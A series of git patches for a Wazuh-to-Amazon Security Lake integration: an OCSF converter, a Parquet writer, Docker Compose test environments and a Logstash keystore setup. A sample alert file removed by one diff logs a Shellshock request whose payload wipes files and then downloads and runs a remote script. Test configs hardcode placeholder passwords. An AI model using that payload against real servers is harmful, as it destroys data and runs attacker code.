+ """ + ocsf_class_template = \ + { + "activity_id": 1, + "category_name": "Findings", + "category_uid": 2, + "class_name": "Detection Finding", + "class_uid": 2004, + "count": event["_source"]["rule"]["firedtimes"], + "message": event["_source"]["rule"]["description"], + "finding_info": { + "analytic": { + "category": join(event["_source"]["rule"]["groups"]), + "name": event["_source"]["decoder"]["name"], + "type_id": 1, + "uid": event["_source"]["rule"]["id"], + }, + "attacks": { + "tactic": { + #"name": join(event["_source"]["rule"]["mitre"]["tactic"]), + "dummy": True + }, + "technique": { + #"name": join(event["_source"]["rule"]["mitre"]["technique"]), + #"uid": join(event["_source"]["rule"]["mitre"]["id"]), + "dummy": True + }, + "version": "v13.1" + }, + "title": event["_source"]["rule"]["description"], + "types": [ + event["_source"]["input"]["type"] + ], + "uid": event["_source"]['id'] + }, + "metadata": { + "log_name": "Security events", + "log_provider": "Wazuh", + "product": { + "name": "Wazuh", + "lang": "en", + "vendor_name": "Wazuh, Inc,." 
+ }, + "version": "1.1.0", + }, + #"raw_data": event["_source"]["full_log"], + "resources": [ { - "activity_id": 1, - "category_name": "Findings", - "category_uid": 2, - "class_name": "Detection Finding", - "class_uid": 2004, - "count": event["rule"]["firedtimes"], - "message": event["rule"]["description"], - "finding_info": { - "analytic": { - "category": join(event["rule"]["groups"]), - "name": event["decoder"]["name"], - "type_id": 1, - "uid": event["rule"]["id"], - }, - "attacks": { - "tactic": { - "name": join(event["rule"]["mitre"]["tactic"]), - }, - "technique": { - "name": join(event["rule"]["mitre"]["technique"]), - "uid": join(event["rule"]["mitre"]["id"]), - }, - "version": "v13.1" - }, - "title": event["rule"]["description"], - "types": [ - event["input"]["type"] - ], - "uid": event['id'] - }, - "metadata": { - "log_name": "Security events", - "log_provider": "Wazuh", - "product": { - "name": "Wazuh", - "lang": "en", - "vendor_name": "Wazuh, Inc,." - }, - "version": "1.1.0", - }, - "raw_data": event["full_log"], - "resources": [ - { - "name": event["agent"]["name"], - "uid": event["agent"]["id"] - }, - ], - "risk_score": event["rule"]["level"], - "severity_id": normalize(event["rule"]["level"]), - "status_id": 99, - "time": event["timestamp"], - "type_uid": 200401, - "unmapped": { - "data_sources": [ - event["_index"], - event["location"], - event["manager"]["name"] - ], - "nist": event["rule"]["nist_800_53"], # Array - } - } + "name": event["_source"]["agent"]["name"], + "uid": event["_source"]["agent"]["id"] + }, + ], + "risk_score": event["_source"]["rule"]["level"], + "severity_id": normalize(event["_source"]["rule"]["level"]), + "status_id": 99, + "time": event["_source"]["timestamp"], + "type_uid": 200401, + "unmapped": { + "data_sources": [ + #event["_source"]["_index"], + event["_source"]["location"], + event["_source"]["manager"]["name"] + ], + #"nist": event["_source"]["rule"]["nist_800_53"], # Array + } + } - return ocsf_class_template + return ocsf_class_template diff --git a/integrations/amazon-security-lake/stdin_to_securitylake.py b/integrations/amazon-security-lake/stdin_to_securitylake.py index 49926a8aa1d64..4fdecc14c073e 100755 --- a/integrations/amazon-security-lake/stdin_to_securitylake.py +++ b/integrations/amazon-security-lake/stdin_to_securitylake.py @@ -1,4 +1,4 @@ -#!/usr/bin/env python3 +#!/src/wazuh-indexer/integrations/amazon-security-lake/bin/python3 import os import sys @@ -7,44 +7,18 @@ import time import json import datetime -from pyarrow import parquet, Table, fs - +from pyarrow import parquet, Table from ocsf import converter block_ending = { "block_ending": True } -s3 = fs.S3FileSystem() - -#def map_to_ocsf(alert_dictionary, mappings, ocsf_output, ocsfschema): -# ocsf_output = {} -# ### Put constants into the output alert -# ocsf_output |= mappings[ocsfschema]['constants'] -# -# for key in mappings[ocsfschema]['mappings']: -# dotted_destination_field = mappings[ocsfschema]['mappings'].get(key) -# depth_levels = dotted_destination.split('.') -# current_level = alert_dictionary[depth_levels[0]] -# if len(depth_levels>1): -# for field in depth_levels[1:]: -# current_level = current_level[field] -# ocsf_output[key] = current_level -# ### We probably need to crop the fields we already -# ### mapped to OCSF from ocsf_output -# ocsf_output['unmapped'] = alert_dictionary - -def encode_parquet(list,bucket_name,folder): - ### We can write directly to S3 from pyarrow: - ### https://arrow.apache.org/docs/python/filesystems.html#s3 - ### 
https://arrow.apache.org/docs/python/generated/pyarrow.fs.S3FileSystem.html#pyarrow.fs.S3FileSystem.open_output_stream - ### - ### Credentials can be stored in ~/.aws/credentials - ### https://docs.aws.amazon.com/sdk-for-cpp/v1/developer-guide/credentials.html - +def encode_parquet(list,foldername,filename): table = Table.from_pylist(list) - parquet.write_to_dataset(table, root_path='s3://{}/{}'.format(bucket_name, folder)) + parquet.write_table(table, '{}/{}.parquet'.format(foldername,filename)) def map_block(fileobject, length): output=[] + ocsf_mapped_alert = {} for line in range(0, length): line = fileobject.readline() if line == '': @@ -52,36 +26,28 @@ def map_block(fileobject, length): break alert = json.loads(line) ocsf_mapped_alert = converter.convert(alert) - #map_to_ocsf(alert, mappings, ocsf_mapped_alert): - output.append(ocsf_mapped_alert) + output.append(ocsf_mapped_alert) return output def get_elapsedseconds(reference_timestamp): current_time = datetime.datetime.now(datetime.timezone.utc) return (current_time - reference_timestamp).total_seconds() - if __name__ == "__main__": - clock = datetime.datetime.now(datetime.timezone.utc) - clockstr = clock.strftime('%F_%H.%M.%S') + date = datetime.datetime.now(datetime.timezone.utc).strftime('%F_%H.%M.%S') parser = argparse.ArgumentParser(description='STDIN to Security Lake pipeline') - parser.add_argument('-b','--bucketname', action='store', help='Name of the output S3 bucket') - parser.add_argument('-f','--foldername', action='store', help='Name of the output S3 bucket\'s folder') - parser.add_argument('-i','--pushinterval', action='store', default=299, help='Time interval in seconds for pushing data to Security Lake') - parser.add_argument('-m','--maxlength', action='store', default=20, help='Event number threshold for submission to Security Lake') - parser.add_argument('-n','--linebuffer', action='store', default=10, help='stdin line buffer length') - parser.add_argument('-s','--sleeptime', action='store', default=5, help='Input buffer polling interval') - parser.add_argument('-v','--ocsfschema', action='store', default='1.1.0', help='Version of the OCSF schema to use') - parser.add_argument('-x','--mapping', action='store', default='ocsf-mapping.json', help='Location of the Wazuh Alert to OCSF mapping (json formatted)') - parser.add_argument('-o','--output', type=str, default="/tmp/stdintosecuritylake.txt", help='File path of the destination file to write to') - parser.add_argument('-d','--debug', action='store_true', help='Activate debugging') + parser.add_argument('-d','--debug', type=bool, action='store_true', help='Activate debugging') + parser.add_argument('-i','--pushinterval', type=int, action='store', default=299, help='Time interval in seconds for pushing data to Security Lake') + parser.add_argument('-l','--logoutput', type=str, default="/tmp/stdintosecuritylake.txt", help='File path of the destination file to write to') + parser.add_argument('-m','--maxlength', type=int, action='store', default=2000, help='Event number threshold for submission to Security Lake') + parser.add_argument('-n','--linebuffer', type=int, action='store', default=100, help='stdin line buffer length') + parser.add_argument('-o','--outputfolder', type=str, action='store', help='Folder or S3 bucket URL to dump parquet files to') + parser.add_argument('-s','--sleeptime', type=int, action='store', default=5, help='Input buffer polling interval') args = parser.parse_args() - logging.basicConfig(format='%(asctime)s %(message)s', filename=args.output, 
encoding='utf-8', level=logging.DEBUG) + logging.basicConfig(format='%(asctime)s %(message)s', filename=args.logoutput, encoding='utf-8', level=logging.DEBUG) logging.info('BUFFERING STDIN') try: - #with open(ocsf_mapping_filename) as jsonfile: - # mappings = json.loads(jsonfile.read()) with os.fdopen(sys.stdin.fileno(), 'rt') as stdin: output_buffer = [] @@ -89,22 +55,20 @@ def get_elapsedseconds(reference_timestamp): try: while True: - ### We can possibly replace all the custom code here - ### and just use Arrow's built-in input and output facilities: - ### * https://arrow.apache.org/docs/python/memory.html#input-and-output - ### * https://arrow.apache.org/docs/python/ipc.html#reading-from-stream-and-file-format-for-pandas - ### * https://stackoverflow.com/questions/52945609/pandas-dataframe-to-parquet-buffer-in-memory - - current_block = map_block(stdin, args.linebuffer ) - if current_block[-1] == block_ending : - output_buffer += current_block[0:current_block.index(block_ending)] - time.sleep(args.sleeptime) + if len(output_buffer) > args.maxlength or get_elapsedseconds(starttimestamp) > args.pushinterval: - encode_parquet(output_buffer,args.bucketname,args.foldername) + encode_parquet(output_buffer,args.outputfolder,'wazuh-{}'.format(date)) logging.debug(json.dumps(output_buffer)) starttimestamp = datetime.datetime.now(datetime.timezone.utc) output_buffer = [] - output_buffer.append(current_block) + + current_block = map_block( stdin, args.linebuffer ) + + if current_block[-1] == block_ending: + output_buffer += current_block[0:-1] + time.sleep(args.sleeptime) + else: + output_buffer += current_block except KeyboardInterrupt: logging.info("Keyboard Interrupt issued") @@ -116,4 +80,3 @@ def get_elapsedseconds(reference_timestamp): logging.error("Error running script") logging.error(e) raise - exit(1) From e06203c32c3bbac39639abe4ff8819ed90663e7e Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Fri, 16 Feb 2024 15:38:53 -0300 Subject: [PATCH 20/34] Remove unnecessary type declaration from debug flag --- integrations/amazon-security-lake/stdin_to_securitylake.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/integrations/amazon-security-lake/stdin_to_securitylake.py b/integrations/amazon-security-lake/stdin_to_securitylake.py index 4fdecc14c073e..b8fa6c17bbf4c 100755 --- a/integrations/amazon-security-lake/stdin_to_securitylake.py +++ b/integrations/amazon-security-lake/stdin_to_securitylake.py @@ -36,7 +36,7 @@ def get_elapsedseconds(reference_timestamp): if __name__ == "__main__": date = datetime.datetime.now(datetime.timezone.utc).strftime('%F_%H.%M.%S') parser = argparse.ArgumentParser(description='STDIN to Security Lake pipeline') - parser.add_argument('-d','--debug', type=bool, action='store_true', help='Activate debugging') + parser.add_argument('-d','--debug', action='store_true', help='Activate debugging') parser.add_argument('-i','--pushinterval', type=int, action='store', default=299, help='Time interval in seconds for pushing data to Security Lake') parser.add_argument('-l','--logoutput', type=str, default="/tmp/stdintosecuritylake.txt", help='File path of the destination file to write to') parser.add_argument('-m','--maxlength', type=int, action='store', default=2000, help='Event number threshold for submission to Security Lake') From 6826e127a60ef34551349dff86a0a6cc11816637 Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Fri, 16 Feb 2024 17:00:15 -0300 Subject: [PATCH 21/34] Improved parquet encoding --- .../stdin_to_securitylake.py | 29 ++++++++++++------- 1 
file changed, 19 insertions(+), 10 deletions(-) diff --git a/integrations/amazon-security-lake/stdin_to_securitylake.py b/integrations/amazon-security-lake/stdin_to_securitylake.py index b8fa6c17bbf4c..ec90025d9afa3 100755 --- a/integrations/amazon-security-lake/stdin_to_securitylake.py +++ b/integrations/amazon-security-lake/stdin_to_securitylake.py @@ -1,4 +1,4 @@ -#!/src/wazuh-indexer/integrations/amazon-security-lake/bin/python3 +#!/home/fede/src/wazuh-indexer/integrations/amazon-security-lake/venv/bin/python3 import os import sys @@ -13,8 +13,13 @@ block_ending = { "block_ending": True } def encode_parquet(list,foldername,filename): - table = Table.from_pylist(list) - parquet.write_table(table, '{}/{}.parquet'.format(foldername,filename)) + try: + table = Table.from_pylist(list) + print(table) + parquet.write_table(table, '{}/{}.parquet'.format(foldername,filename)) + except Exception as e: + logging.error(e) + raise def map_block(fileobject, length): output=[] @@ -44,7 +49,8 @@ def get_elapsedseconds(reference_timestamp): parser.add_argument('-o','--outputfolder', type=str, action='store', help='Folder or S3 bucket URL to dump parquet files to') parser.add_argument('-s','--sleeptime', type=int, action='store', default=5, help='Input buffer polling interval') args = parser.parse_args() - logging.basicConfig(format='%(asctime)s %(message)s', filename=args.logoutput, encoding='utf-8', level=logging.DEBUG) + #logging.basicConfig(format='%(asctime)s %(message)s', filename=args.logoutput, encoding='utf-8', level=logging.DEBUG) + logging.basicConfig(format='%(asctime)s %(message)s', encoding='utf-8', level=logging.DEBUG) logging.info('BUFFERING STDIN') try: @@ -55,12 +61,6 @@ def get_elapsedseconds(reference_timestamp): try: while True: - - if len(output_buffer) > args.maxlength or get_elapsedseconds(starttimestamp) > args.pushinterval: - encode_parquet(output_buffer,args.outputfolder,'wazuh-{}'.format(date)) - logging.debug(json.dumps(output_buffer)) - starttimestamp = datetime.datetime.now(datetime.timezone.utc) - output_buffer = [] current_block = map_block( stdin, args.linebuffer ) @@ -70,6 +70,15 @@ def get_elapsedseconds(reference_timestamp): else: output_buffer += current_block + if len(output_buffer) == 0: + continue + + if len(output_buffer) > args.maxlength or get_elapsedseconds(starttimestamp) > args.pushinterval: + logging.info('Writing data to parquet file') + encode_parquet(output_buffer,args.outputfolder,'wazuh-{}'.format(date)) + starttimestamp = datetime.datetime.now(datetime.timezone.utc) + output_buffer = [] + except KeyboardInterrupt: logging.info("Keyboard Interrupt issued") exit(0) From 9cfc24786cd96d6c4f239e3d4e64db0475299c12 Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Mon, 19 Feb 2024 15:38:04 -0300 Subject: [PATCH 22/34] Initial commit for test env's docker-compose.yml --- .../stdin_to_securitylake.py | 1 - integrations/docker/docker-compose.yml | 117 ++++++++++++++++++ 2 files changed, 117 insertions(+), 1 deletion(-) create mode 100644 integrations/docker/docker-compose.yml diff --git a/integrations/amazon-security-lake/stdin_to_securitylake.py b/integrations/amazon-security-lake/stdin_to_securitylake.py index ec90025d9afa3..eee82036c3ff5 100755 --- a/integrations/amazon-security-lake/stdin_to_securitylake.py +++ b/integrations/amazon-security-lake/stdin_to_securitylake.py @@ -15,7 +15,6 @@ def encode_parquet(list,foldername,filename): try: table = Table.from_pylist(list) - print(table) parquet.write_table(table, '{}/{}.parquet'.format(foldername,filename)) 
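+        # NOTE: write_table() replaces the destination file if it already exists;
+        # the caller builds the filename from a timestamp taken once at start-up,
+        # so successive flushes within the same run overwrite the previous batch.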
except Exception as e: logging.error(e) diff --git a/integrations/docker/docker-compose.yml b/integrations/docker/docker-compose.yml new file mode 100644 index 0000000000000..ebd6b348c5116 --- /dev/null +++ b/integrations/docker/docker-compose.yml @@ -0,0 +1,117 @@ +version: "3.8" + +services: + + events-generator: + image: events-generator + build: + dockerfile_inline: | + FROM ubuntu:20.04 + RUN apt update && apt install -y python3-requests + container_name: events-generator + volumes: + - ../tools/events-generator:/home/events-generator + hostname: events-generator + working_dir: "/home/events-generator" + entrypoint: sh -c "python3 run.py" + networks: + wazuh-indexer-dev: + aliases: + - events-generator + ipv4_address: 172.18.0.2 + depends_on: + - wazuh-indexer + + wazuh-indexer: + image: wazuh/wazuh-indexer:4.8.0-beta1 + container_name: wazuh-indexer + hostname: wazuh-indexer + restart: always + networks: + wazuh-indexer-dev: + aliases: + - wazuh-indexer + ipv4_address: 172.18.0.3 + ports: + - "9222:9200" + depends_on: + - generator + environment: + - "OPENSEARCH_JAVA_OPTS=-Xms1g -Xmx1g" + - "bootstrap.memory_lock=true" + - 'INDEXER_PASSWORD=SecretPassword' + ulimits: + memlock: + soft: -1 + hard: -1 + nofile: + soft: 65536 + hard: 65536 + volumes: + - ./wazuh-indexer-data:/var/lib/wazuh-indexer + - ./config/wazuh_indexer_ssl_certs/root-ca.pem:/usr/share/wazuh-indexer/certs/root-ca.pem + - ./config/wazuh_indexer_ssl_certs/wazuh1.indexer-key.pem:/usr/share/wazuh-indexer/certs/wazuh1.indexer.key + - ./config/wazuh_indexer_ssl_certs/wazuh1.indexer.pem:/usr/share/wazuh-indexer/certs/wazuh1.indexer.pem + - ./config/wazuh_indexer_ssl_certs/admin.pem:/usr/share/wazuh-indexer/certs/admin.pem + - ./config/wazuh_indexer_ssl_certs/admin-key.pem:/usr/share/wazuh-indexer/certs/admin-key.pem + - ./config/wazuh_indexer/wazuh1.indexer.yml:/usr/share/wazuh-indexer/opensearch.yml + - ./config/wazuh_indexer/internal_users.yml:/usr/share/wazuh-indexer/opensearch-security/internal_users.yml + + generator: + image: wazuh/wazuh-certs-generator:0.0.1 + hostname: wazuh-certs-generator + volumes: + - ./config/wazuh_indexer_ssl_certs/:/certificates/ + - ./config/certs.yml:/config/certs.yml + environment: + - HTTP_PROXY=YOUR_PROXY_ADDRESS_OR_DNS + + logstash: + image: logstash + build: + dockerfile_inline: | + FROM ubuntu:20.04 + RUN apt update && apt install -y iputils-ping wget gpg apt-transport-https + WORKDIR /home/logstash + RUN wget -qO - https://artifacts.elastic.co/GPG-KEY-elasticsearch | sudo gpg --dearmor -o /usr/share/keyrings/elastic-keyring.gpg && \ + echo "deb [signed-by=/usr/share/keyrings/elastic-keyring.gpg] https://artifacts.elastic.co/packages/8.x/apt stable main" | sudo tee -a /etc/apt/sources.list.d/elastic-8.x.list && \ + apt update && \ + apt install -y logstash && \ + chown -R logstash:logstash /etc/logstash && \ + chown logstash:logstash /home/logstash + entrypoint: /usr/share/bin/logstash --path.settings /etc/logstash --config.reload.automatic + container_name: logstash + hostname: logstash + user: logstash + volumes: + - ../amazon-security-lake:/home/logstash + - ../amazon-security-lake/logstash/pipe-output.conf:/etc/logstash/conf.d/pipe-output.conf + - ../amazon-security-lake/logstash/pipelines.yml:/etc/logstash/pipelines.yml + networks: + wazuh-indexer-dev: + aliases: + - logstash + ipv4_address: 172.18.0.4 + depends_on: + - wazuh-indexer + - s3-ninja + + s3-ninja: + image: scireum/s3-ninja + container_name: s3-ninja + hostname: s3-ninja + volumes: + - 
./s3-ninja_data:/home/sirius/data + networks: + wazuh-indexer-dev: + aliases: + - s3-ninja + ipv4_address: 172.18.0.5 + ports: + - "9444:9000" + +networks: + wazuh-indexer-dev: + ipam: + config: + - subnet: "172.18.0.0/16" From 324d1f5033871722a60c4b1b54ac16b9bee5eb6e Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Mon, 19 Feb 2024 16:52:36 -0300 Subject: [PATCH 23/34] Remove sudo references from docker-compose.yml --- integrations/docker/docker-compose.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/integrations/docker/docker-compose.yml b/integrations/docker/docker-compose.yml index ebd6b348c5116..dd7f12f119e05 100644 --- a/integrations/docker/docker-compose.yml +++ b/integrations/docker/docker-compose.yml @@ -73,8 +73,8 @@ services: FROM ubuntu:20.04 RUN apt update && apt install -y iputils-ping wget gpg apt-transport-https WORKDIR /home/logstash - RUN wget -qO - https://artifacts.elastic.co/GPG-KEY-elasticsearch | sudo gpg --dearmor -o /usr/share/keyrings/elastic-keyring.gpg && \ - echo "deb [signed-by=/usr/share/keyrings/elastic-keyring.gpg] https://artifacts.elastic.co/packages/8.x/apt stable main" | sudo tee -a /etc/apt/sources.list.d/elastic-8.x.list && \ + RUN wget -qO - https://artifacts.elastic.co/GPG-KEY-elasticsearch | gpg --dearmor -o /usr/share/keyrings/elastic-keyring.gpg && \ + echo "deb [signed-by=/usr/share/keyrings/elastic-keyring.gpg] https://artifacts.elastic.co/packages/8.x/apt stable main" | tee -a /etc/apt/sources.list.d/elastic-8.x.list && \ apt update && \ apt install -y logstash && \ chown -R logstash:logstash /etc/logstash && \ From cb5ac7321bea365f46965b8bb5fa1359991422ac Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=C3=81lex=20Ruiz?= Date: Wed, 21 Feb 2024 16:34:34 +0100 Subject: [PATCH 24/34] Add operational Python module to transform events to OCSF --- .../amazon-security-lake/docker-compose.yml | 67 +++++++++++ .../logstash/{ => pipeline}/pipe-output.conf | 11 +- .../logstash/{ => pipeline}/wazuh-s3.conf | 0 .../amazon-security-lake/logstash/setup.sh | 15 +++ .../amazon-security-lake/ocsf/__init__.py | 2 - .../amazon-security-lake/ocsf/converter.py | 89 -------------- .../ocsf/wazuh-event.sample.json | 90 -------------- .../amazon-security-lake/requirements.txt | 3 +- integrations/amazon-security-lake/run.py | 34 ++++++ .../stdin_to_securitylake.py | 5 +- .../transform/__init__.py | 1 + .../transform/converter.py | 112 ++++++++++++++++++ .../transform/legacy/legacy_converter.py | 87 ++++++++++++++ .../legacy/legacy_test.py} | 10 +- .../transform/models/__init__.py | 2 + .../transform/models/ocsf.py | 66 +++++++++++ .../transform/models/wazuh.py | 50 ++++++++ .../wazuh-event.sample.json | 76 ++++++++++++ 18 files changed, 525 insertions(+), 195 deletions(-) create mode 100644 integrations/amazon-security-lake/docker-compose.yml rename integrations/amazon-security-lake/logstash/{ => pipeline}/pipe-output.conf (69%) rename integrations/amazon-security-lake/logstash/{ => pipeline}/wazuh-s3.conf (100%) create mode 100644 integrations/amazon-security-lake/logstash/setup.sh delete mode 100644 integrations/amazon-security-lake/ocsf/__init__.py delete mode 100644 integrations/amazon-security-lake/ocsf/converter.py delete mode 100644 integrations/amazon-security-lake/ocsf/wazuh-event.sample.json create mode 100644 integrations/amazon-security-lake/run.py create mode 100644 integrations/amazon-security-lake/transform/__init__.py create mode 100644 integrations/amazon-security-lake/transform/converter.py create mode 100644 
integrations/amazon-security-lake/transform/legacy/legacy_converter.py rename integrations/amazon-security-lake/{ocsf/test.py => transform/legacy/legacy_test.py} (57%) create mode 100644 integrations/amazon-security-lake/transform/models/__init__.py create mode 100644 integrations/amazon-security-lake/transform/models/ocsf.py create mode 100644 integrations/amazon-security-lake/transform/models/wazuh.py create mode 100644 integrations/amazon-security-lake/wazuh-event.sample.json diff --git a/integrations/amazon-security-lake/docker-compose.yml b/integrations/amazon-security-lake/docker-compose.yml new file mode 100644 index 0000000000000..6c5c1c21445c9 --- /dev/null +++ b/integrations/amazon-security-lake/docker-compose.yml @@ -0,0 +1,67 @@ +version: '3' +services: + opensearch-node: + image: opensearchproject/opensearch:latest # This should be the same image used for opensearch-node1 to avoid issues + container_name: opensearch-node + environment: + - cluster.name=opensearch-cluster + - node.name=opensearch-node + - discovery.seed_hosts=opensearch-node + - cluster.initial_cluster_manager_nodes=opensearch-node + - bootstrap.memory_lock=true + - "OPENSEARCH_JAVA_OPTS=-Xms512m -Xmx512m" + ulimits: + memlock: + soft: -1 + hard: -1 + nofile: + soft: 65536 + hard: 65536 + volumes: + - opensearch-data:/usr/share/opensearch/data + networks: + - opensearch-net + opensearch-dashboards: + image: opensearchproject/opensearch-dashboards:latest # Make sure the version of opensearch-dashboards matches the version of opensearch installed on other nodes + container_name: opensearch-dashboards + ports: + - 5601:5601 # Map host port 5601 to container port 5601 + expose: + - "5601" # Expose port 5601 for web access to OpenSearch Dashboards + environment: + OPENSEARCH_HOSTS: '["https://opensearch-node:9200"]' # Define the OpenSearch nodes that OpenSearch Dashboards will query + networks: + - opensearch-net + logstash: + build: + context: . 
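+      # 'dockerfile_inline' is only supported by recent Docker Compose releases
+      # (v2.17 or later, to the best of our knowledge); older versions will
+      # reject this build section.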
+ dockerfile_inline: | + FROM logstash:8.12.1 + + COPY --chown=logstash:logstash logstash/setup.sh /usr/share/logstash/bin/setup.sh + COPY --chown=logstash:logstash logstash/pipeline/pipe-output.conf /usr/share/logstash/pipeline/pipe-output.config + + RUN bash /usr/share/logstash/bin/setup.sh + RUN /usr/share/logstash/bin/logstash-plugin install logstash-input-opensearch + container_name: logstash + environment: + LOG_LEVEL: trace + LOGSTASH_KEYSTORE_PASS: "SecretPassword" + MONITORING_ENABLED: false + ports: + - "5000:5000/tcp" + - "5000:5000/udp" + - "5044:5044" + - "9600:9600" + depends_on: + - opensearch-node + networks: + - opensearch-net + command: tail -f /dev/null + # command: logstash -f /usr/share/logstash/pipeline/pipe-output.config + +volumes: + opensearch-data: + +networks: + opensearch-net: \ No newline at end of file diff --git a/integrations/amazon-security-lake/logstash/pipe-output.conf b/integrations/amazon-security-lake/logstash/pipeline/pipe-output.conf similarity index 69% rename from integrations/amazon-security-lake/logstash/pipe-output.conf rename to integrations/amazon-security-lake/logstash/pipeline/pipe-output.conf index 4f64eb5a46a54..0cc7a7d089ec3 100644 --- a/integrations/amazon-security-lake/logstash/pipe-output.conf +++ b/integrations/amazon-security-lake/logstash/pipeline/pipe-output.conf @@ -1,11 +1,10 @@ input { opensearch { - hosts => ["127.0.0.1:9200"] - user => "${WAZUH_INDEXER_USERNAME}" - password => "${WAZUH_INDEXER_PASSWORD}" + hosts => ["opensearch-node:9200"] + user => "${INDEXER_USERNAME}" + password => "${INDEXER_PASSWORD}" + ssl => false index => "wazuh-alerts-4.x-*" - ssl => true - ca_file => "/etc/logstash/wi-certs/root-ca.pem" query => '{ "query": { "range": { @@ -15,7 +14,7 @@ input { } } }' - target => "_source" + target => "_source" schedule => "* * * * *" } } diff --git a/integrations/amazon-security-lake/logstash/wazuh-s3.conf b/integrations/amazon-security-lake/logstash/pipeline/wazuh-s3.conf similarity index 100% rename from integrations/amazon-security-lake/logstash/wazuh-s3.conf rename to integrations/amazon-security-lake/logstash/pipeline/wazuh-s3.conf diff --git a/integrations/amazon-security-lake/logstash/setup.sh b/integrations/amazon-security-lake/logstash/setup.sh new file mode 100644 index 0000000000000..2b1fc109f401a --- /dev/null +++ b/integrations/amazon-security-lake/logstash/setup.sh @@ -0,0 +1,15 @@ +#!/usr/bin/bash + +# This script creates and configures a keystore for Logstash to store +# indexer's credentials. NOTE: works only for dockerized logstash. 
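+# The password exported below must match the LOGSTASH_KEYSTORE_PASS value that
+# the Logstash process is later started with; otherwise Logstash will not be
+# able to open the keystore it creates here.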
+# Source: https://www.elastic.co/guide/en/logstash/current/keystore.html + +# Prepare keystore +set +o history +export LOGSTASH_KEYSTORE_PASS="SecretPassword" +set -o history + +# Create keystore +/usr/share/logstash/bin/logstash-keystore create +echo "admin" | /usr/share/logstash/bin/logstash-keystore add INDEXER_USERNAME +echo "admin" | /usr/share/logstash/bin/logstash-keystore add INDEXER_PASSWORD diff --git a/integrations/amazon-security-lake/ocsf/__init__.py b/integrations/amazon-security-lake/ocsf/__init__.py deleted file mode 100644 index 777a7d20549b5..0000000000000 --- a/integrations/amazon-security-lake/ocsf/__init__.py +++ /dev/null @@ -1,2 +0,0 @@ -# Python module placeholder -# TODO export submodules \ No newline at end of file diff --git a/integrations/amazon-security-lake/ocsf/converter.py b/integrations/amazon-security-lake/ocsf/converter.py deleted file mode 100644 index c927afa8fe87f..0000000000000 --- a/integrations/amazon-security-lake/ocsf/converter.py +++ /dev/null @@ -1,89 +0,0 @@ -#!/usr/bin/python3 - -# event comes from Filebeat -#event = {} -#print(event) - -def normalize(level: int) -> int: - """ - Normalizes rule level into the 0-6 range, required by OCSF. - """ - # TODO normalization - return level - - -def join(iterable, separator=","): - return (separator.join(iterable)) - - -def convert(event: dict) -> dict: - """ - Converts Wazuh events to OCSF's Detecting Finding (2004) class. - """ - ocsf_class_template = \ - { - "activity_id": 1, - "category_name": "Findings", - "category_uid": 2, - "class_name": "Detection Finding", - "class_uid": 2004, - "count": event["_source"]["rule"]["firedtimes"], - "message": event["_source"]["rule"]["description"], - "finding_info": { - "analytic": { - "category": join(event["_source"]["rule"]["groups"]), - "name": event["_source"]["decoder"]["name"], - "type_id": 1, - "uid": event["_source"]["rule"]["id"], - }, - "attacks": { - "tactic": { - #"name": join(event["_source"]["rule"]["mitre"]["tactic"]), - "dummy": True - }, - "technique": { - #"name": join(event["_source"]["rule"]["mitre"]["technique"]), - #"uid": join(event["_source"]["rule"]["mitre"]["id"]), - "dummy": True - }, - "version": "v13.1" - }, - "title": event["_source"]["rule"]["description"], - "types": [ - event["_source"]["input"]["type"] - ], - "uid": event["_source"]['id'] - }, - "metadata": { - "log_name": "Security events", - "log_provider": "Wazuh", - "product": { - "name": "Wazuh", - "lang": "en", - "vendor_name": "Wazuh, Inc,." 
- }, - "version": "1.1.0", - }, - #"raw_data": event["_source"]["full_log"], - "resources": [ - { - "name": event["_source"]["agent"]["name"], - "uid": event["_source"]["agent"]["id"] - }, - ], - "risk_score": event["_source"]["rule"]["level"], - "severity_id": normalize(event["_source"]["rule"]["level"]), - "status_id": 99, - "time": event["_source"]["timestamp"], - "type_uid": 200401, - "unmapped": { - "data_sources": [ - #event["_source"]["_index"], - event["_source"]["location"], - event["_source"]["manager"]["name"] - ], - #"nist": event["_source"]["rule"]["nist_800_53"], # Array - } - } - - return ocsf_class_template diff --git a/integrations/amazon-security-lake/ocsf/wazuh-event.sample.json b/integrations/amazon-security-lake/ocsf/wazuh-event.sample.json deleted file mode 100644 index 3f35697a9fe36..0000000000000 --- a/integrations/amazon-security-lake/ocsf/wazuh-event.sample.json +++ /dev/null @@ -1,90 +0,0 @@ -{ - "_index": "wazuh-alerts-4.x-2024.02.08", - "_id": "yBMliY0Bt8FzffO0BOIu", - "_version": 1, - "_score": null, - "_source": { - "input": { - "type": "log" - }, - "agent": { - "name": "redacted.com", - "id": "000" - }, - "manager": { - "name": "redacted.com" - }, - "data": { - "protocol": "GET", - "srcip": "000.111.222.10", - "id": "404", - "url": "/cgi-bin/jarrewrite.sh" - }, - "rule": { - "firedtimes": 1, - "mail": false, - "level": 6, - "pci_dss": [ - "11.4" - ], - "tsc": [ - "CC6.1", - "CC6.8", - "CC7.2", - "CC7.3" - ], - "description": "Shellshock attack attempt", - "groups": [ - "web", - "accesslog", - "attack" - ], - "mitre": { - "technique": [ - "Exploitation for Privilege Escalation", - "Exploit Public-Facing Application" - ], - "id": [ - "T1068", - "T1190" - ], - "tactic": [ - "Privilege Escalation", - "Initial Access" - ] - }, - "id": "31166", - "nist_800_53": [ - "SI.4" - ], - "info": "CVE-2014-6271https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271", - "gdpr": [ - "IV_35.7.d" - ] - }, - "location": "/var/log/nginx/access.log", - "decoder": { - "name": "web-accesslog" - }, - "id": "1707402914.872885", - "GeoLocation": { - "city_name": "Amsterdam", - "country_name": "Netherlands", - "region_name": "North Holland", - "location": { - "lon": 4.9087, - "lat": 52.3534 - } - }, - "full_log": "000.111.222.10 - - [08/Feb/2024:11:35:12 -0300] \"GET /cgi-bin/jarrewrite.sh HTTP/1.1\" 404 162 \"-\" \"() { :; }; echo ; /bin/bash -c 'rm -rf *; cd /tmp; wget http://0.0.0.0/baddie.sh; chmod 777 baddie.sh; ./baddie.sh'\"", - "timestamp": "2024-02-08T11:35:14.334-0300" - }, - "fields": { - "timestamp": [ - "2024-02-08T14:35:14.334Z" - ] - }, - "sort": [ - 1707402914334 - 